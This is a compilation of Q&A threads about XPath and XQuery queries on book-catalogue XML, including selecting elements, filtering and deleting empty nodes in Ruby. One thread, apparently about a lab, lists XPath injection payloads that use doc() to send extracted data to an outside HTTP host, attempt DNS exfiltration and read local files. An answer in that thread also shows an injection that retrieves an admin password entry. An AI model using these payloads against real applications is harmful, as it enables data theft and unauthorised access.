The XPath (bookstore/book/title|bookstore/book/author) selects title, author if both of them exist
How can I select just the first match of these two and not both, and get this value for all the 'book' nodes in the document
(bookstore/book/title|bookstore/book/author)[1] limits the result to just the first 'title' in the first book.But I need to be able to get results from other book nodes in the document
I'm assuming that by 'first' you mean 'first in document order', not 'first referenced in my XPath expression.'
In XPath 2.0, you can say
bookstore/book/((title|author)[1])
If you only have XPath 1.0, let us know and we can proceed from there. Also let us know something of the broader environment (XSLT? XQuery? Javascript?) because some of this may have to be done outside of XPath.
Update: I just tested this, using Simple Online XPath Tester with XPath 2.0. Given the following XML input:
<?xml version="1.0" encoding="UTF-8"?>
<bookstore>
<book category="COOKING">
<title lang="en">Everyday Italian</title>
<author>Giada De Laurentiis</author>
<year>2005</year>
<price>30.00</price>
</book>
<book category="CHILDREN">
<author>J K. Rowling</author>
<year>2005</year>
<price>29.99</price>
</book>
<book category="WEB">
<title lang="en">XQuery Kick Start</title>
<author>James McGovern</author>
<author>Per Bothner</author>
<author>Kurt Cagle</author>
<author>James Linn</author>
<author>Vaidyanathan Nagarajan</author>
<year>2003</year>
<price>49.99</price>
</book>
<book category="WEB">
<title lang="en">Learning XML</title>
<author>Erik T. Ray</author>
<year>2003</year>
<price>39.95</price>
</book>
</bookstore>
and the XPath expression
/bookstore/book/((title|author)[1])
I get the following output, which appears to be what you asked for:
<title lang="en">Everyday Italian</title>
<author>J K. Rowling</author>
<title lang="en">XQuery Kick Start</title>
<title lang="en">Learning XML</title>
For XPath 1.0
If you don't have XPath 2.0, as I suspect you don't, and you still want to do it all in XPath, here's what I would do:
/bookstore/book/title[1] | /bookstore/book[not(title)]/author[1]
What does this do? It gives the (first) title of each book that has a title, as well as the (first) author of each book that doesn't have a title.
This expression is not quite as general as what you asked for: it assumes that <title> comes before <author> when it exists, as it does in your sample data. If your data has author before title, then the above expression will still prefer title despite the order.
If you really need the first of the two regardless of whether it's author or title, try
/bookstore/book/title[1][not(preceding-sibling::author)] |
/bookstore/book/author[1][not(preceding-sibling::title)]
Related
I'm trying to understand how to use the doc() function of xpath in several ways to carry out xpath injections
Lab's query:
String xquery = "/root/books/book[contains(title/text(), '" + query + "')]";
I can use both versions 2.0 and 3.0
I'm able to extract data and export it through HTTP, for example:
test') and doc((concat('http://IP/data/?d=',(encode-for-uri((normalize-space((/*[1]/*[2]/*[2]/#*[2]))))))))/data=220248 and string('1'='1
But i'm not able to:
Extract data and export it through DNS requests:
test') and doc((concat(name((/[2])) , 'domain.com'))) and string('1'='1* -> it does not give any error, but nothing happens ( i don't know why stackoverflow strips the * from /*[2] )
Read a local xml file ( file's permissions are fine )
test') and doc('file:///home/lubuntu/test.xml')/text() and string('1'='1 -> it says file not found, when it is clearly there..
What is wrong in my payloads?
#updates
xpath processor: net.sf.saxon
os: Linux lubuntu 4.18.0-17-generic #18~18.04.1-Ubuntu
JAVA_HOME=/usr/local/openjdk-11
JAVA_VERSION=11.0.9.1
LANG=C.UTF-8
#about the file reading: problem solved. the lab was running inside of a docker
#about the data exfiltration via dns requests, i still can't figure it out why nothing happens. I tried also basic injection like doc((concat('ABCTEST', '.domain.com' ))) and string('1'='1 but still nothing happens..
It is difficult to understand what exactly you are trying to achieve.
Here is a simple example of XPath injection in XSLT/XPath 3.0 using as a base the fact that:
contains($anyString), '') eq true()
Xml document:
<x>
<root>
<books>
<book>
<title>Book1</title>
</book>
<book>
<title>Book2</title>
</book>
<book>
<title>Book3</title>
</book>
</books>
</root>
</x>
XSLT stylesheet:
<xsl:stylesheet version="3.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output omit-xml-declaration="yes" indent="yes"/>
<xsl:template match="/">
<xsl:variable name="query">'</xsl:variable>
<xsl:variable name="vXpath1">/x/root/books/book[contains(title/text(), '</xsl:variable>
<xsl:variable name="vXpath2" select="$vXpath1 || $query || ')]'"/>
<xsl:evaluate xpath="$vXpath2" context-item="/" />
</xsl:template>
</xsl:stylesheet>
and finally, the result of applying the transformation on the Xml document:
<book>
<title>Book1</title>
</book>
<book>
<title>Book2</title>
</book>
<book>
<title>Book3</title>
</book>
Explanation:
We were able to get all <book> elements of the document and not only one of them that contains a particular string (the password :) ) in its <title>
Update
Here is another example:
we have a slightly different XML document:
<x>
<root>
<books>
<book name="regular">
<title>Book1 with password: regular</title>
</book>
<book name="admin">
<title>Admin with password: SuperSecret</title>
</book>
<book name="maintainer">
<title>Book3 with password: maintainer</title>
</book>
</books>
</root>
</x>
And the transformation now is (only $query is changed):
<xsl:stylesheet version="3.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output omit-xml-declaration="yes" indent="yes"/>
<xsl:template match="/">
<xsl:variable name="query">') and #name eq "admin" and true(</xsl:variable>
<xsl:variable name="vXpath1">/x/root/books/book[contains(title/text(), '</xsl:variable>
<xsl:variable name="vXpath2" select="$vXpath1 || $query || ')]'"/>
<xsl:evaluate xpath="$vXpath2" context-item="/" />
</xsl:template>
</xsl:stylesheet>
Now the result is that we get exactly the <book> element with the desired name "admin":
<book name="admin">
<title>Admin with password: SuperSecret</title>
</book>
<CATALOG>
<BOOK>
<TITLE>Hadoop Defnitive Guide</TITLE>
<AUTHOR>Tom White</AUTHOR>
<COUNTRY>US</COUNTRY>
<COMPANY>CLOUDERA</COMPANY>
<PRICE>24.90</PRICE>
<YEAR>2012</YEAR>
</BOOK>
</CATALOG>
This is xml i am using.
I want to extract only TITLE and COMPANY elements.Is there any way to extract them by using Regex or XPath();
First thing you need to do is format your XML like so:
<CATALOG>
<BOOK>
<TITLE>Hadoop Defnitive Guide</TITLE>
<AUTHOR>Tom White</AUTHOR>
<COUNTRY>US</COUNTRY>
<COMPANY>CLOUDERA</COMPANY>
<PRICE>24.90</PRICE>
<YEAR>2012</YEAR>
</BOOK>
</CATALOG>
Then you can extract those elements like so:
/CATALOG/BOOK/*[self::title or self::company]
More about axes you can find here: http://www.w3schools.com/xsl/xpath_axes.asp
I have this XML file and I need to get the name and the author/s of a book, where name of at least one author starts with "E".
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE library SYSTEM "knihy.dtd">
<library>
<book isbn="0470114878">
<author hlavni="hlavni">David Hunter</author>
<author>Jeff Rafter</author>
<author>Joe Fawcett</author>
<author>Eric van der Vlist</author>
<author>Danny Ayers</author>
<name>Beginning XML</name>
<publisher>Wrox</publisher>
</book>
<book isbn="0596004206">
<author>Erik Ray</author>
<name>Learning XML</name>
<publisher>O'Reilly</publisher>
</book>
<book isbn="0764547593">
<author>Kay Ethier</author>
<author>Alan Houser</author>
<name>XML Weekend Crash Course</name>
<year>2001</year>
</book>
<book isbn="1590596765">
<author>Sas Jacobs</author>
<name>Beginning XML with DOM and Ajax</name>
<publisher>Apress</publisher>
<year>2006</year>
</book>
</library>
I tried this approach
for $book in /library/book[starts-with(author, "E")]
return $book
but it returns XPathException in invokeTransform: A sequence of more than one item is not allowed as the first argument of starts-with() ("David Hunter", "Jeff Rafter", ...). So how can I check this sequence?
As the error message suggests, use starts-with() in predicate for individual author elements, instead of passing all author child elements to starts-with() function at once :
for $book in /library/book[author[starts-with(., "E")]]
return $book
xpathtester demo
The above will return all books where name of at least one of the author starts with "E".
output :
<book isbn="0470114878">
<author hlavni="hlavni">David Hunter</author>
<author>Jeff Rafter</author>
<author>Joe Fawcett</author>
<author>Eric van der Vlist</author>
<author>Danny Ayers</author>
<name>Beginning XML</name>
<publisher>Wrox</publisher>
</book>
<book isbn="0596004206">
<author>Erik Ray</author>
<name>Learning XML</name>
<publisher>O'Reilly</publisher>
</book>
New to Xpath. Was trying in to use XML task in SSIS to load some values. Using Microsoft' XML inventory mentioned below.
How can I load first-name value in bookstore/books where style is novel and award = 'Pulitzer'?
//book[#style='novel' and ./author/award/text()='Pulitzer'] is what I am trying. It gives the whole element. Where should I modify to just get the first-name value?
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="myfile.xsl" ?>
<bookstore specialty="novel">
<book style="autobiography">
<author>
<first-name>Joe</first-name>
<last-name>Bob</last-name>
<award>Trenton Literary Review Honorable Mention</award>
</author>
<price>12</price>
</book>
<book style="textbook">
<author>
<first-name>Mary</first-name>
<last-name>Bob</last-name>
<publication>Selected Short Stories of
<first-name>Mary</first-name>
<last-name>Bob</last-name>
</publication>
</author>
<editor>
<first-name>Britney</first-name>
<last-name>Bob</last-name>
</editor>
<price>55</price>
</book>
<magazine style="glossy" frequency="monthly">
<price>2.50</price>
<subscription price="24" per="year"/>
</magazine>
<book style="novel" id="myfave">
<author>
<first-name>Toni</first-name>
<last-name>Bob</last-name>
<degree from="Trenton U">B.A.</degree>
<degree from="Harvard">Ph.D.</degree>
<award>P</award>
<publication>Still in Trenton</publication>
<publication>Trenton Forever</publication>
</author>
<price intl="Canada" exchange="0.7">6.50</price>
<excerpt>
<p>It was a dark and stormy night.</p>
<p>But then all nights in Trenton seem dark and
stormy to someone who has gone through what
<emph>I</emph> have.</p>
<definition-list>
<term>Trenton</term>
<definition>misery</definition>
</definition-list>
</excerpt>
</book>
<my:book xmlns:my="uri:mynamespace" style="leather" price="29.50">
<my:title>Who's Who in Trenton</my:title>
<my:author>Robert Bob</my:author>
</my:book>
</bookstore>
I got an answer.
//book[#style='novel' and ./author/award/text()='Pulitzer']//first-name
Use:
/*/book[#style='novel']/author[award = 'Pulitzer']/first-name
This selects any first-name element whose author parent has a award child with string value of 'Pulitzer' and whose (of the author) parent is a book whose style attribute has value "novel" and whose parent is the top element of the XML document.
A similar question in the same context. How can I do the vice-versa ? Let's suppose I want to find the id of all those books whose price is greater than 20 ? I know I am being a nudge, but really want to clear my understanding.
Here is the needed XPATH :
//book/price[text() > 20]/..
I have the below XML, where i have few child elements with empty text.
doc = <<'XML'
<Book>
<BookId>BK45647</BookId>
<BookName>The Client by John Grisham</BookName>
<BookAuthenticationCode></BookAuthenticationCode>
<BookCategory>Suspense</BookCategory>
<BookSequence></BookSequence>
<BookPublisherInfo>
<PublisherId>PBBK12345</PublisherId>
<PublisherName>Mc.GrawHill</PublisherName>
<PublisherIndex></PublisherIndex>
<PublisherCategoryQuota></PublisherCategoryQuota>
</BookPublisherInfo>
<BookPurchaselist>
<Customer>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<MiddleName></MiddleName>
<NickName></NickName>
</Customer>
<Customer>
<FirstName>Winston</FirstName>
<LastName>Churchill</LastName>
<MiddleName></MiddleName>
<NickName></NickName>
</Customer>
</BookPurchaselist>
</Book>
XML
I tried with below code but its somehow not working properly.
cust = doc.at_xpath("//Customer")
cust.each do |cust_obj|
if cust_obj.has_text? == false
cust_obj.delete
end
end
This is somehow not working properly and giving the below output
<Book>
<BookId>BK45647</BookId>
<BookName>The Client by John Grisham</BookName>
<BookAuthenticationCode></BookAuthenticationCode>
<BookCategory>Suspense</BookCategory>
<BookSequence></BookSequence>
<BookPublisherInfo>
<PublisherId>PBBK12345</PublisherId>
<PublisherName>Mc.GrawHill</PublisherName>
<PublisherIndex></PublisherIndex>
<PublisherCategoryQuota></PublisherCategoryQuota>
</BookPublisherInfo>
<BookPurchaselist>
<Customer>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<MiddleName></MiddleName>
</Customer>
<Customer>
<FirstName>Winston</FirstName>
<LastName>Churchill</LastName>
<NickName></NickName>
</Customer>
</BookPurchaselist>
</Book>
Few of the elements which has empty text are getting and few of them remain as such. How can i recursively delete elements at specific xpath(with empty data) and re-write the XML.
Got stuck here.. Need suggestions.
doc.xpath('//Customer/child::*[not(text())]').each do |node|
node.remove
end
You can use not(node()) if you want to delete nodes that have no children, too.
EDIT: Full working example (using the same code as above)
require 'nokogiri'
xml = <<-XML
<Book>
<BookId>BK45647</BookId>
<BookName>The Client by John Grisham</BookName>
<BookAuthenticationCode></BookAuthenticationCode>
<BookCategory>Suspense</BookCategory>
<BookSequence></BookSequence>
<BookPublisherInfo>
<PublisherId>PBBK12345</PublisherId>
<PublisherName>Mc.GrawHill</PublisherName>
<PublisherIndex></PublisherIndex>
<PublisherCategoryQuota></PublisherCategoryQuota>
</BookPublisherInfo>
<BookPurchaselist>
<Customer>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<MiddleName></MiddleName>
</Customer>
<Customer>
<FirstName>Winston</FirstName>
<LastName>Churchill</LastName>
<NickName></NickName>
</Customer>
</BookPurchaselist>
</Book>
XML
doc = Nokogiri.parse(xml)
doc.xpath('//Customer/child::*[not(text())]').each do |node|
node.remove
end
puts doc.to_s
The output of this program is:
<?xml version="1.0"?>
<Book>
<BookId>BK45647</BookId>
<BookName>The Client by John Grisham</BookName>
<BookAuthenticationCode/>
<BookCategory>Suspense</BookCategory>
<BookSequence/>
<BookPublisherInfo>
<PublisherId>PBBK12345</PublisherId>
<PublisherName>Mc.GrawHill</PublisherName>
<PublisherIndex/>
<PublisherCategoryQuota/>
</BookPublisherInfo>
<BookPurchaselist>
<Customer>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
</Customer>
<Customer>
<FirstName>Winston</FirstName>
<LastName>Churchill</LastName>
</Customer>
</BookPurchaselist>
</Book>